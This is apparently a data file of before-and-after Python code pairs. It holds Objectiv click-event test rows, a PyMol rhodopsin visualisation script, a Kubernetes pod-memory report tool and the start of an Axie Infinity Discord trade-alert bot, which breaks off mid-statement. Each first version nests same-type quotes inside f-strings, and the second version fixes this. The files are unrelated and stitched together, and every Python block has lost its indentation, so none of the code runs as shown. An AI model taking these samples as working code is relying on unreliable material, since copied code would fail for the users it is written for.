"5835d00e-4099-44cc-9191-8baccc2d32fa", "time": 1636476074003, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}'),
('12b55ed5-4295-4fc1-bf1f-88d64d1ac309','2021-12-02','2021-12-02 14:23:36.282','b2df75d2-d7ca-48ac-9747-af47d7a4a2b3','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://objectiv.io/", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "SectionContext", "id": "navbar-top", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "LinkContext", "id": "About Us", "text": "About Us", "href": "about", "_types": ["AbstractContext", "AbstractLocationContext", "ActionContext", "ItemContext", "LinkContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-website", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://objectiv.io/", "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "fbca9fc6-4b76-459e-968c-0ecf3c78de4d", "cookie_id": "fbca9fc6-4b76-459e-968c-0ecf3c78de4d", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "690ada97-c0fa-4378-9c04-bd1f7753505a", "time": 1636476111218, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}'),
('12b55ed5-4295-4fc1-bf1f-88d64d1ac310','2021-12-03','2021-12-03 10:23:36.283','b2df75d2-d7ca-48ac-9747-af47d7a4a2b4','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://objectiv.io/about", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "SectionContext", "id": "navbar-top", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "OverlayContext", "id": "hamburger-menu", "_types": ["AbstractContext", "AbstractLocationContext", "OverlayContext", "SectionContext"]}, {"_type": "LinkContext", "id": "Docs", "text": "Docs", "href": "https://objectiv.io/docs/", "_types": ["AbstractContext", "AbstractLocationContext", "ActionContext", "ItemContext", "LinkContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-website", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://objectiv.io/", "user_agent": "Mozilla/5.0 (Linux; Android 10; POCOPHONE F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "5b1e395f-ef4c-438c-aab2-ae0aa19131ee", "cookie_id": "5b1e395f-ef4c-438c-aab2-ae0aa19131ee", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "089ff754-35d6-49da-bb32-dc9031b10289", "time": 1636476142139, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}'),
('12b55ed5-4295-4fc1-bf1f-88d64d1ac311','2021-11-29','2021-11-29 10:23:36.286','b2df75d2-d7ca-48ac-9747-af47d7a4a2b2','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://objectiv.io/", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "SectionContext", "id": "main", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "SectionContext", "id": "taxonomy", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "LinkContext", "id": "cta-docs-taxonomy", "text": "Docs - Taxonomy", "href": "/docs/taxonomy/", "_types": ["AbstractContext", "AbstractLocationContext", "ActionContext", "ItemContext", "LinkContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-website", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://objectiv.io/", "user_agent": "Mozilla/5.0 (Linux; Android 11; SM-G986B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "81a8ace2-273b-4b95-b6a6-0fba33858a22", "cookie_id": "81a8ace2-273b-4b95-b6a6-0fba33858a22", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "fd54aa9a-b8b8-4feb-968d-8fa9f736c596", "time": 1636476191693, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}'),
('12b55ed5-4295-4fc1-bf1f-88d64d1ac312','2021-11-29','2021-11-29 10:23:36.287','b2df75d2-d7ca-48ac-9747-af47d7a4a2b2','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://objectiv.io/docs/taxonomy/", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "SectionContext", "id": "navbar-top", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "LinkContext", "id": "logo", "text": "Objectiv Documentation Logo", "href": "/docs/", "_types": ["AbstractContext", "AbstractLocationContext", "ActionContext", "ItemContext", "LinkContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-docs", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://objectiv.io/", "user_agent": "Mozilla/5.0 (Linux; Android 11; SM-G986B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "81a8ace2-273b-4b95-b6a6-0fba33858a22", "cookie_id": "81a8ace2-273b-4b95-b6a6-0fba33858a22", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "e2445152-327a-466f-a2bf-116f0146ab7a", "time": 1636476196460, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}')
]
_TEST_DATA_OBJECTIV_COLUMN_NAMES = ['event_id', 'day', 'moment', 'cookie_id', 'value'] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
''' Align a list of molecules using `super` command in PyMol. The first item
in the list is considered as the reference.
'''
import pymolPy3
import pyrotein as pr
import os
import colorsimple as cs
from loaddata import load_xlsx
# Specify chains to process...
fl_chain = "chains.comp.xlsx"
lines = load_xlsx(fl_chain)
drc = "pdb"
# Define atoms used for distance matrix analysis...
peptide = ["N", "CA", "C", "O"]
# Specify the range of atoms from rhodopsin...
nterm = 1
cterm = 322
len_peptide = (cterm - nterm + 1) * len(peptide)
# Start pymol
pm = pymolPy3.pymolPy3()
## pm("bg white")
# Get the color palette...
color_items = [ i[4] for i in lines ]
spe = { i : 0 for i in color_items }.keys()
color_dict = cs.color_species(spe, hexsym = '0x')
# Define the transmembrane regions...
TMs = {"TM1" : [ 33, 65],
"ICL1" : [ 66, 69],
"TM2" : [ 70, 100],
"ECL1" : [101, 104],
"TM3" : [105, 140],
"ICL2" : [141, 148],
"TM4" : [149, 173],
"ECL2" : [174, 198],
"TM5" : [199, 226],
"ICL3" : [227, 239],
"TM6" : [240, 277],
"ECL3" : [278, 287],
"TM7" : [288, 307],
"L78" : [308, 309],
"H8" : [310, 322] }
# Choose the select to show colors...
disp_range = [33, 322]
color_clusters = [ str(i) for i in range(disp_range[0],disp_range[1] + 1) ]
# [[[ cluster 1 -- active ]]]
# Go through each structure
custom_clusters = [25, 28, 29, 30, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45,
46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62,
63, 64, 65, 68, 69, 70, 71, 72, 73]
# Define custom color
custom_color = {
"active" : "0xffa600",
"inactive" : "0x003f5c",
"average" : "0xffd1ff",
}
entries = []
for i in custom_clusters[:]:
# Unpack parameters
_, pdb, chain, _, chrome = lines[i][:5]
# Load a mobile structure...
entry = f"{pdb}_{chain}.align"
pdb_path = os.path.join(drc, f"{entry}.pdb")
pm(f"load {pdb_path}")
entries.append(entry)
pm(f"select cls_active, ({" or ".join(entries)}) and (resi {nterm}-{cterm})")
pm(f"select disp_active, %cls_active and resi {"+".join(color_clusters)}")
pm(f"select ret_active, ({" or ".join(entries)}) and resn ret")
pm(f"select hoh_active, ({" or ".join(entries)}) and resn hoh")
pm(f"disable %cls_active")
pm(f"disable %disp_active")
pm(f"disable %ret_active")
pm(f"disable %hoh_active")
# The appearance of TMs in cls_active...
# Cartoon of TMs
pm(f"hide cartoon, %cls_active")
pm(f"set cartoon_color, white, %cls_active")
# Ribbon of TMs
## pm(f"show ribbon, %cls_active")
pm(f"set ribbon_color, white, %cls_active")
# Set the water representation...
pm(f"color {custom_color["active"]}, %hoh_active")
# Color specific region to inactive color...
pm(f"set ribbon_color, {custom_color["active"]}, %cls_active and resi {"+".join(color_clusters)}")
pm(f"set cartoon_color, {custom_color["active"]}, %cls_active and resi {"+".join(color_clusters)}")
## pm(f"set stick_color, {custom_color["active"]}, %cls_active")
pm(f"cmd.color('{custom_color["active"]}', '%cls_active')")
pm(f"util.cnc('%cls_active')")
pm(f"set stick_color, {custom_color["active"]}, %ret_active")
# [[[ cluster 2 -- inactive ]]]
custom_clusters = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16,
17, 18, 19, 20, 21, 22, 23, 24, 26, 27, 31, 32, 66, 67]
entries = []
for i in custom_clusters[:]:
# Unpack parameters
_, pdb, chain, _, chrome = lines[i][:5]
# Load a mobile structure...
entry = f"{pdb}_{chain}.align"
pdb_path = os.path.join(drc, f"{entry}.pdb")
pm(f"load {pdb_path}")
entries.append(entry)
pm(f"select cls_inactive, ({" or ".join(entries)}) and (resi {nterm}-{cterm})")
pm(f"select disp_inactive, %cls_inactive and resi {"+".join(color_clusters)}")
pm(f"select ret_inactive, ({" or ".join(entries)}) and resn ret")
pm(f"select hoh_inactive, ({" or ".join(entries)}) and resn hoh")
pm(f"disable %cls_inactive")
pm(f"disable %disp_inactive")
pm(f"disable %ret_inactive")
pm(f"disable %hoh_inactive")
pm(f"select cluster_gray, (%cls_active or %cls_inactive) and not (%disp_active or %disp_inactive)")
pm(f"disable %cluster_gray")
# The appearance of cls_inactive
# Cartoon of TMs
pm(f"hide cartoon, %cls_inactive")
pm(f"set cartoon_color, white, %cls_inactive")
# Ribbon of TMs
## pm(f"show ribbon, %cls_inactive")
pm(f"set ribbon_color, white, %cls_inactive")
# Set the water representation...
pm(f"color {custom_color["inactive"]}, %hoh_inactive")
# Color specific region to inactive color...
pm(f"set ribbon_color, {custom_color["inactive"]}, %cls_inactive and resi {"+".join(color_clusters)}")
pm(f"set cartoon_color, {custom_color["inactive"]}, %cls_inactive and resi {"+".join(color_clusters)}")
## pm(f"set stick_color, {custom_color["inactive"]}, %cls_inactive")
pm(f"cmd.color('{custom_color["inactive"]}', '%cls_inactive')")
pm(f"util.cnc('%cls_inactive')")
pm(f"set stick_color, {custom_color["inactive"]}, %ret_inactive")
# Customization
## # Set O, N color...
## pm(f"color red, (%cls_active or %cls_inactive) and (name O*)")
## pm(f"color blue, (%cls_active or %cls_inactive) and (name N*)")
# Set view...
pm("set_view (\\")
pm(" 0.719689012, -0.683778822, 0.120294474,\\")
pm(" -0.315132022, -0.167348713, 0.934176385,\\")
pm(" -0.618639231, -0.710220516, -0.335924447,\\")
pm(" -0.000630774, 0.000504352, -155.440078735,\\")
pm(" 56.917179108, 13.737834930, 0.117419243,\\")
pm(" 113.265342712, 197.978042603, -20.000000000 )")
# Resize water sphere scale...
pm(f"set sphere_scale, 0.25, %hoh_active or %hoh_inactive")
# Hide the non-rhodopsin region...
pm(f"hide cartoon, (not resi {nterm}-{cterm})")
pm(f"hide ribbon, (not resi {nterm}-{cterm})")
pm(f"hide ribbon, (not resi {disp_range[0]}-{disp_range[1]})")
transp = 0
pm("bg white")
pm("set ribbon_color, gray, %cluster_gray")
pm(f"set ribbon_transparency, {transp}")
pm(f"set stick_transparency, {transp}")
# Highlight average structures...
pm("load active.pdb")
pm(f"set cartoon_transparency, {transp}, active")
pm(f"set cartoon_color, {custom_color["active"]}, active")
pm(f"hide cartoon, (not resi {disp_range[0]}-{disp_range[1]}) and active")
pm("load inactive.pdb")
pm(f"set cartoon_transparency, {transp}, inactive")
pm(f"set cartoon_color, {custom_color["inactive"]}, inactive")
pm(f"hide cartoon, (not resi {disp_range[0]}-{disp_range[1]}) and inactive")
pm("load average.pdb")
pm(f"set cartoon_transparency, {transp}, average")
pm(f"set cartoon_color, {custom_color["average"]}, average")
pm(f"hide cartoon, (not resi {disp_range[0]}-{disp_range[1]}) and average")
# Select the transmembrane...
for k, v in TMs.items():
pm(f"select {k}, resi {v[0]}-{v[1]} and (%average or %active or %inactive)")
pm(f"disable {k}")
# Set lighting to rubber...
pm("set ambient, 0.05")
pm("set direct, 0.2")
pm("set spec_direct, 0")
pm("set shininess, 10.")
pm("set reflect, 0.5")
pm("set spec_count, -1")
pm("set spec_reflect, -1.")
pm("set specular, 1")
pm("set specular_intensity, 0.5")
# Try265
pm(f"select his211, resi 211")
pm(f"select glu122, resi 122")
pm(f"show sticks, %his211 or %glu122")
# Highlight environment
pm(f"hide cartoon, average or inactive")
pm(f"hide sticks, average or inactive")
pm(f"set cartoon_transparency, 0.8, active or inactive or average")
pm(f"hide sticks, ret_inactive")
pm(f"hide sticks, cls_inactive")
pm(f"hide everything, hoh_inactive")
pm(f"deselect")
input("Press Enter to exit...")
# 9.63 x 5.30 for output
| #!/usr/bin/env python3
# -*- coding: utf-8 -*-
''' Align a list of molecules using `super` command in PyMol. The first item
in the list is considered as the reference.
'''
import pymolPy3
import pyrotein as pr
import os
import colorsimple as cs
from loaddata import load_xlsx
# Specify chains to process...
fl_chain = "chains.comp.xlsx"
lines = load_xlsx(fl_chain)
drc = "pdb"
# Define atoms used for distance matrix analysis...
peptide = ["N", "CA", "C", "O"]
# Specify the range of atoms from rhodopsin...
nterm = 1
cterm = 322
len_peptide = (cterm - nterm + 1) * len(peptide)
# Start pymol
pm = pymolPy3.pymolPy3()
## pm("bg white")
# Get the color palette...
color_items = [ i[4] for i in lines ]
spe = { i : 0 for i in color_items }.keys()
color_dict = cs.color_species(spe, hexsym = '0x')
# Define the transmembrane regions...
TMs = {"TM1" : [ 33, 65],
"ICL1" : [ 66, 69],
"TM2" : [ 70, 100],
"ECL1" : [101, 104],
"TM3" : [105, 140],
"ICL2" : [141, 148],
"TM4" : [149, 173],
"ECL2" : [174, 198],
"TM5" : [199, 226],
"ICL3" : [227, 239],
"TM6" : [240, 277],
"ECL3" : [278, 287],
"TM7" : [288, 307],
"L78" : [308, 309],
"H8" : [310, 322] }
# Choose the select to show colors...
disp_range = [33, 322]
color_clusters = [ str(i) for i in range(disp_range[0],disp_range[1] + 1) ]
# [[[ cluster 1 -- active ]]]
# Go through each structure
custom_clusters = [25, 28, 29, 30, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45,
46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62,
63, 64, 65, 68, 69, 70, 71, 72, 73]
# Define custom color
custom_color = {
"active" : "0xffa600",
"inactive" : "0x003f5c",
"average" : "0xffd1ff",
}
entries = []
for i in custom_clusters[:]:
# Unpack parameters
_, pdb, chain, _, chrome = lines[i][:5]
# Load a mobile structure...
entry = f"{pdb}_{chain}.align"
pdb_path = os.path.join(drc, f"{entry}.pdb")
pm(f"load {pdb_path}")
entries.append(entry)
pm(f"select cls_active, ({' or '.join(entries)}) and (resi {nterm}-{cterm})")
pm(f"select disp_active, %cls_active and resi {'+'.join(color_clusters)}")
pm(f"select ret_active, ({' or '.join(entries)}) and resn ret")
pm(f"select hoh_active, ({' or '.join(entries)}) and resn hoh")
pm(f"disable %cls_active")
pm(f"disable %disp_active")
pm(f"disable %ret_active")
pm(f"disable %hoh_active")
# The appearance of TMs in cls_active...
# Cartoon of TMs
pm(f"hide cartoon, %cls_active")
pm(f"set cartoon_color, white, %cls_active")
# Ribbon of TMs
## pm(f"show ribbon, %cls_active")
pm(f"set ribbon_color, white, %cls_active")
# Set the water representation...
pm(f"color {custom_color['active']}, %hoh_active")
# Color specific region to inactive color...
pm(f"set ribbon_color, {custom_color['active']}, %cls_active and resi {'+'.join(color_clusters)}")
pm(f"set cartoon_color, {custom_color['active']}, %cls_active and resi {'+'.join(color_clusters)}")
## pm(f"set stick_color, {custom_color['active']}, %cls_active")
pm(f"cmd.color('{custom_color['active']}', '%cls_active')")
pm(f"util.cnc('%cls_active')")
pm(f"set stick_color, {custom_color['active']}, %ret_active")
# [[[ cluster 2 -- inactive ]]]
custom_clusters = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16,
17, 18, 19, 20, 21, 22, 23, 24, 26, 27, 31, 32, 66, 67]
entries = []
for i in custom_clusters[:]:
# Unpack parameters
_, pdb, chain, _, chrome = lines[i][:5]
# Load a mobile structure...
entry = f"{pdb}_{chain}.align"
pdb_path = os.path.join(drc, f"{entry}.pdb")
pm(f"load {pdb_path}")
entries.append(entry)
pm(f"select cls_inactive, ({' or '.join(entries)}) and (resi {nterm}-{cterm})")
pm(f"select disp_inactive, %cls_inactive and resi {'+'.join(color_clusters)}")
pm(f"select ret_inactive, ({' or '.join(entries)}) and resn ret")
pm(f"select hoh_inactive, ({' or '.join(entries)}) and resn hoh")
pm(f"disable %cls_inactive")
pm(f"disable %disp_inactive")
pm(f"disable %ret_inactive")
pm(f"disable %hoh_inactive")
pm(f"select cluster_gray, (%cls_active or %cls_inactive) and not (%disp_active or %disp_inactive)")
pm(f"disable %cluster_gray")
# The appearance of cls_inactive
# Cartoon of TMs
pm(f"hide cartoon, %cls_inactive")
pm(f"set cartoon_color, white, %cls_inactive")
# Ribbon of TMs
## pm(f"show ribbon, %cls_inactive")
pm(f"set ribbon_color, white, %cls_inactive")
# Set the water representation...
pm(f"color {custom_color['inactive']}, %hoh_inactive")
# Color specific region to inactive color...
pm(f"set ribbon_color, {custom_color['inactive']}, %cls_inactive and resi {'+'.join(color_clusters)}")
pm(f"set cartoon_color, {custom_color['inactive']}, %cls_inactive and resi {'+'.join(color_clusters)}")
## pm(f"set stick_color, {custom_color['inactive']}, %cls_inactive")
pm(f"cmd.color('{custom_color['inactive']}', '%cls_inactive')")
pm(f"util.cnc('%cls_inactive')")
pm(f"set stick_color, {custom_color['inactive']}, %ret_inactive")
# Customization
## # Set O, N color...
## pm(f"color red, (%cls_active or %cls_inactive) and (name O*)")
## pm(f"color blue, (%cls_active or %cls_inactive) and (name N*)")
# Set view...
pm("set_view (\\")
pm(" 0.719689012, -0.683778822, 0.120294474,\\")
pm(" -0.315132022, -0.167348713, 0.934176385,\\")
pm(" -0.618639231, -0.710220516, -0.335924447,\\")
pm(" -0.000630774, 0.000504352, -155.440078735,\\")
pm(" 56.917179108, 13.737834930, 0.117419243,\\")
pm(" 113.265342712, 197.978042603, -20.000000000 )")
# Resize water sphere scale...
pm(f"set sphere_scale, 0.25, %hoh_active or %hoh_inactive")
# Hide the non-rhodopsin region...
pm(f"hide cartoon, (not resi {nterm}-{cterm})")
pm(f"hide ribbon, (not resi {nterm}-{cterm})")
pm(f"hide ribbon, (not resi {disp_range[0]}-{disp_range[1]})")
transp = 0
pm("bg white")
pm("set ribbon_color, gray, %cluster_gray")
pm(f"set ribbon_transparency, {transp}")
pm(f"set stick_transparency, {transp}")
# Highlight average structures...
pm("load active.pdb")
pm(f"set cartoon_transparency, {transp}, active")
pm(f"set cartoon_color, {custom_color['active']}, active")
pm(f"hide cartoon, (not resi {disp_range[0]}-{disp_range[1]}) and active")
pm("load inactive.pdb")
pm(f"set cartoon_transparency, {transp}, inactive")
pm(f"set cartoon_color, {custom_color['inactive']}, inactive")
pm(f"hide cartoon, (not resi {disp_range[0]}-{disp_range[1]}) and inactive")
pm("load average.pdb")
pm(f"set cartoon_transparency, {transp}, average")
pm(f"set cartoon_color, {custom_color['average']}, average")
pm(f"hide cartoon, (not resi {disp_range[0]}-{disp_range[1]}) and average")
# Select the transmembrane...
for k, v in TMs.items():
pm(f"select {k}, resi {v[0]}-{v[1]} and (%average or %active or %inactive)")
pm(f"disable {k}")
# Set lighting to rubber...
pm("set ambient, 0.05")
pm("set direct, 0.2")
pm("set spec_direct, 0")
pm("set shininess, 10.")
pm("set reflect, 0.5")
pm("set spec_count, -1")
pm("set spec_reflect, -1.")
pm("set specular, 1")
pm("set specular_intensity, 0.5")
# Try265
pm(f"select his211, resi 211")
pm(f"select glu122, resi 122")
pm(f"show sticks, %his211 or %glu122")
# Highlight environment
pm(f"hide cartoon, average or inactive")
pm(f"hide sticks, average or inactive")
pm(f"set cartoon_transparency, 0.8, active or inactive or average")
pm(f"hide sticks, ret_inactive")
pm(f"hide sticks, cls_inactive")
pm(f"hide everything, hoh_inactive")
pm(f"deselect")
input("Press Enter to exit...")
# 9.63 x 5.30 for output
|
#!/usr/bin/env python3
"""This utility compares pod resource requests and limits against actual usage"""
import subprocess
import argparse
from kubernetes import client, config
from bytes2human import human2bytes, bytes2human
def get_pods(kube, namespace):
"""Return a list of pods in a namespace"""
return kube.list_pod_for_all_namespaces(field_selector='metadata.namespace=%s' % namespace,
include_uninitialized=False,
watch=False)
def get_usage(namespace):
"""Return usage for a namespace, uses heapster"""
return subprocess.run(['kubectl', 'top', 'pod', '--namespace=%s' % namespace],
stdout=subprocess.PIPE).stdout.decode('utf-8')
def formatted_pods(pods):
"""Create a dictionary of pods with their resource information"""
pod_map = {}
for pod in pods.items:
podname = pod.metadata.name
pod_namespace = pod.metadata.namespace
memory_request = 0
memory_limit = 0
for container in pod.spec.containers:
try:
# Convert human readable IEC values to an integer
memory_request += human2bytes(container.resources.requests['memory'])
memory_limit += human2bytes(container.resources.limits['memory'])
except (KeyError, TypeError): # Skip containers without defined requests or limits
pass
pod_map[podname] = {'namespace': pod_namespace,
'resources': {'requests': {'memory': memory_request},
'limits': {'memory': memory_limit}}}
return pod_map
def main(namespace):
"""Compare pod usage to its requests and limits"""
# Load kubernetes config from environment, and connect
config.load_kube_config()
kube = client.CoreV1Api()
# Get a dictionary of pods and their resources
pods = formatted_pods(get_pods(kube, namespace))
# Get pod usage from the namespace
usage = get_usage(namespace)
# Convert multiline usage output, skip the first row which is a header row
for row in usage.splitlines()[1:]:
podname = row.split()[0]
memory_usage = human2bytes(row.split()[2])
pods[podname]['resources']['usage'] = {'memory': memory_usage}
# A namespaces may not exist, and may not contain pods
if not pods:
print('No resources found.')
exit(1)
else:
total_limits = 0
total_requests = 0
total_usage = 0
total_diff = 0
# Print header row
print(f'{'NAME':64} {'MEMORY LIMIT':16} {'MEMORY REQUEST':16} {'MEMORY USED':16} {'DIFFERENCE'}')
# Print details for each pod in the namespace
for pod, state in pods.items():
requests = state['resources']['requests']['memory']
limits = state['resources']['limits']['memory']
try:
usage = state['resources']['usage']['memory']
except KeyError: # Skip non-running pods
usage = 0
# Add it all up
difference = usage - requests
total_limits += limits
total_requests += requests
total_usage += usage
total_diff += difference
# Print pod specific details
print(f'{pod:64} {bytes2human(limits):16} {bytes2human(requests):16} {bytes2human(usage):16} {bytes2human(difference)}')
# Print totals
print(f'{'TOTAL':64} {bytes2human(total_limits):16} {bytes2human(total_requests):16} {bytes2human(total_usage):16} {bytes2human(total_diff)}')
if __name__ == "__main__":
PARSER = argparse.ArgumentParser(
description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter
)
PARSER.add_argument("namespace", help="Kubernetes namespace.")
ARGS = PARSER.parse_args()
main(ARGS.namespace)
| #!/usr/bin/env python3
"""This utility compares pod resource requests and limits against actual usage"""
import subprocess
import argparse
from kubernetes import client, config
from bytes2human import human2bytes, bytes2human
def get_pods(kube, namespace):
"""Return a list of pods in a namespace"""
return kube.list_pod_for_all_namespaces(field_selector='metadata.namespace=%s' % namespace,
include_uninitialized=False,
watch=False)
def get_usage(namespace):
"""Return usage for a namespace, uses heapster"""
return subprocess.run(['kubectl', 'top', 'pod', '--namespace=%s' % namespace],
stdout=subprocess.PIPE).stdout.decode('utf-8')
def formatted_pods(pods):
"""Create a dictionary of pods with their resource information"""
pod_map = {}
for pod in pods.items:
podname = pod.metadata.name
pod_namespace = pod.metadata.namespace
memory_request = 0
memory_limit = 0
for container in pod.spec.containers:
try:
# Convert human readable IEC values to an integer
memory_request += human2bytes(container.resources.requests['memory'])
memory_limit += human2bytes(container.resources.limits['memory'])
except (KeyError, TypeError): # Skip containers without defined requests or limits
pass
pod_map[podname] = {'namespace': pod_namespace,
'resources': {'requests': {'memory': memory_request},
'limits': {'memory': memory_limit}}}
return pod_map
def main(namespace):
"""Compare pod usage to its requests and limits"""
# Load kubernetes config from environment, and connect
config.load_kube_config()
kube = client.CoreV1Api()
# Get a dictionary of pods and their resources
pods = formatted_pods(get_pods(kube, namespace))
# Get pod usage from the namespace
usage = get_usage(namespace)
# Convert multiline usage output, skip the first row which is a header row
for row in usage.splitlines()[1:]:
podname = row.split()[0]
memory_usage = human2bytes(row.split()[2])
pods[podname]['resources']['usage'] = {'memory': memory_usage}
# A namespaces may not exist, and may not contain pods
if not pods:
print('No resources found.')
exit(1)
else:
total_limits = 0
total_requests = 0
total_usage = 0
total_diff = 0
# Print header row
print(f'{"NAME":64} {"MEMORY LIMIT":16} {"MEMORY REQUEST":16} {"MEMORY USED":16} {"DIFFERENCE"}')
# Print details for each pod in the namespace
for pod, state in pods.items():
requests = state['resources']['requests']['memory']
limits = state['resources']['limits']['memory']
try:
usage = state['resources']['usage']['memory']
except KeyError: # Skip non-running pods
usage = 0
# Add it all up
difference = usage - requests
total_limits += limits
total_requests += requests
total_usage += usage
total_diff += difference
# Print pod specific details
print(f'{pod:64} {bytes2human(limits):16} {bytes2human(requests):16} {bytes2human(usage):16} {bytes2human(difference)}')
# Print totals
print(f'{"TOTAL":64} {bytes2human(total_limits):16} {bytes2human(total_requests):16} {bytes2human(total_usage):16} {bytes2human(total_diff)}')
if __name__ == "__main__":
PARSER = argparse.ArgumentParser(
description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter
)
PARSER.add_argument("namespace", help="Kubernetes namespace.")
ARGS = PARSER.parse_args()
main(ARGS.namespace)
|
##> Imports
import math
import sys
# > 3rd party dependencies
import pandas as pd
import gspread
import gspread_dataframe as gd
from urllib.request import urlopen
from PIL import Image
from io import BytesIO
# > Discord dependencies
import discord
from discord.ext import commands
from discord.ext.tasks import loop
# > Local dependencies
from alerts.api import api_genes, api_owner_axies
from config import config
# Login using the .json file
gc = gspread.service_account(filename="authentication.json")
class Axie_trades(commands.Cog):
def __init__(self, bot):
self.bot = bot
# This serves as a database, saves: "id", "auction", "class", "breedCount", "parts", "image", "price"
self.axie_db = pd.DataFrame({})
# Start function execution
self.get_axie_auctions.start()
# Could be quicker
@loop(minutes=15)
async def get_axie_auctions(self):
"""Main function that is looped every hour"""
# Save all important data in dataframe
df = pd.DataFrame({})
# Get the address dataframe
address_df = await self.get_addresses()
addresses = address_df["Address"].tolist()
# Do this for every address in the dataframe
for address in addresses:
owned_axies = await self.get_axies(address)
owned_axies["Manager"] = address_df.loc[address_df["Address"] == address][
"Manager"
].tolist()[0]
df = pd.concat([df, owned_axies], ignore_index=True)
# If axie_ids is empty
if self.axie_db.empty:
self.axie_db = df
# Compare
else:
# Get all ids of current axies
new_ids = df["id"].tolist()
old_ids = self.axie_db["id"].tolist()
# Difference: XOR
diff = list(set(new_ids) ^ set(old_ids))
# Sold
if len(new_ids) < len(old_ids):
for id in diff:
await self.send_msg(self.axie_db, id, "sold")
# Buy
elif len(new_ids) > len(old_ids):
for id in diff:
await self.send_msg(df, id, "bought")
# No difference in ids
else:
# Check if price is not NaN
new_auctions = df.loc[~df["price"].isna()]["id"].tolist()
old_auctions = self.axie_db.loc[~self.axie_db["price"].isna()][
"id"
].tolist()
# Difference: XOR
auction_diff = list(set(new_auctions) ^ set(old_auctions))
# New listing!
if len(new_auctions) > len(old_auctions):
for id in auction_diff:
await self.send_msg(df, id, "is selling")
# Update old db
self.axie_db = df
async def send_msg(self, df, id, keyword):
"""Sends a message in the discord channel"""
# Set variables based on id and df
row = df.loc[df["id"] == id]
link = (
"https://marketplace.axieinfinity.com/axie/" + row["id"].tolist()[0] + "/"
)
# Call genes api
genes = await self.get_genes(id)
if not genes.empty:
d = ""
r1 = ""
r2 = ""
r1_title = f"R1 ({genes["r1 deviation"].tolist()[0]})"
r2_title = f"R2 ({genes["r2 deviation"].tolist()[0]})"
for part in ["eyes", "ears", "mouth", "horn", "back", "tail"]:
d += f"{(genes[part].tolist()[0]["d"]["name"])}\n"
r1 += f"{(genes[part].tolist()[0]["r1"]["name"])}\n"
r2 += f"{(genes[part].tolist()[0]["r2"]["name"])}\n"
else:
d = r1 = r2 = "Unknown"
r1_title = "R1"
r2_title = "R2"
# Send message in discord channel
channel = discord.utils.get(
self.bot.get_all_channels(),
guild__name=config["DEBUG"]["GUILD_NAME"]
if len(sys.argv) > 1 and sys.argv[1] == "-test"
else config["DISCORD"]["GUILD_NAME"],
name=config["LOOPS"]["AXIE_TRADES"]["CHANNEL"],
)
# Price
if not math.isnan(row["price"].tolist()[0]):
e = discord.Embed(
